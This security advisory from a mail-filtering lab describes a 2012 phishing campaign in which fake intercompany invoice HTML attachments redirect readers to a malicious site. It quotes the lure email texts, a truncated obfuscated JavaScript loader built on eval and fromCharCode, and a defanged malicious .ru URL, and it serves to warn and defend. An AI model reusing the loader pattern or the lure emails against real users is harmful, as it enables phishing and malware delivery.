Obfuscated javascript appears in emails with attached HTML invoices


MX Lab, http://www.mxlab.eu, started to intercept a new email security risk by email. The email in question contains an attached HTML file – an intercompany invoice – that in fact redirects the reader to a hosted web site page that contains obfuscated Javascript.

The email is send from the spoofed address and has the following body:

Hallo

Attached the inter-company inv. for the period July 2012 til Aug. 2012.(Internet Explorer file)

Thanks you

JENE Pickett
Boyd Gaming Corp.

Good day

Attached the intercompany inv. for the period July 2012 til Aug. 2012.(Internet Explorer file)
Thanks a lot for support setting up this process.
CASSY LOFTON
AMR Corporation Corp.

Hi

Attached the intercompany inv. for the period July 2012 til Aug. 2012.(Internet Explorer file)

Thanks a lot

Karlie Sanford
WLC Corp.

The attached HTML file has the name Invoice_PA****.htm – * replaces a number.

The HTML code:

———————————————

Please wait

Please wait… You will be forwarded…

 

Internet Explorer / Mozilla Firefox compatible only

 

dbshre=170;try{window.document.body/=2}catch(gdsgsdg){if(dbshre)
{zaq=0;try{v=document.createElement(“div”);}catch(agdsg){zaq=1;}if(!zaq)
{e=eval;}ss=String;asgq=new Array(109,89,107,43,56,43,49,52,4,___CUT____
,116);s=””;for(i=0;i-106!=0;i++){if(window.document)s+=ss[“fro”+”mCha”+”rCo”+”de”]
(1*asgq[i]-(i%5-5-3-1));}
z=s;e(s);}}

———————————————

This HTML will forard the reader to hxxp://esigbsoahd.ru:8080/forum/links/column.php where the obfuscated Javascript is present.

You can find out on Google that this is in fact a security risk in an old format from 2011 that somehow has been reactivated. The invoice period also mentions July to August 2012.

MX Lab does recommend not to click on the attached HTML document in any way and/or follow the redirect.